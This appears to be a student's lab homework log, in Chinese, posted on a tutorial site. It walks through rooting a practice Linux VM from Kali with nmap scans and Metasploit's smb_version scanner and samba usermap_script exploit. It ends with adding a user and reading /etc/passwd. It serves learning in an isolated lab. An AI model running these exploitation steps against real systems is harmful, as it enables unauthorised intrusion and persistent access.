栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

12.23 作业记录

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

12.23 作业记录

获取Linux系统的root权限

1.启动靶机和Kali系统

启动靶机

启动Kali

2.信息收集(采集) nmap

2.1 查找存活主机

nmap 192.168.198.132 【由于网络配置更改,所以使用的IP地址在后文有修改】

(修改两虚拟机在同一网段的具体流程:

 依次点击 “更改配置” +> “还原默认设置”

 检查攻击机和靶机的网络适配器(这里需要一样,若不一样,需要手动修改)

 

 

)

2.2 扫描开放端口

nmap -sS -Pn -A 192.168.204.129  #【-Pn 有点问题】

3. 查找漏洞信息

3.1 收集具体的版本号与对应的漏洞

漏洞收集工具(数据库) metasploite

search scanner/smb #查找smb协议

(或者 在kali界面 右上角 

点击“ metasploit framework”  可切换 [ msf6 > ] )

use auxiliary/scanner/smb/smb_version    #使用版本探测器

3.2 查找相应的漏洞工具

3.3 利用漏洞工具进行攻击

use exploit/multi/samba/usermap_script  //切换漏洞工具

show options  //显示需要在攻击前需要设置的数据

set RHOSTS 192.168.204.129  #此为靶机IP地址

(在这里直接输入下面的命令)

4. 获取目标机的 root 权限。新建一个用户

攻击机创建用户

useradd -m test

前往靶机查看

cat /etc/passwd  #查看用户信息

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/675704.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号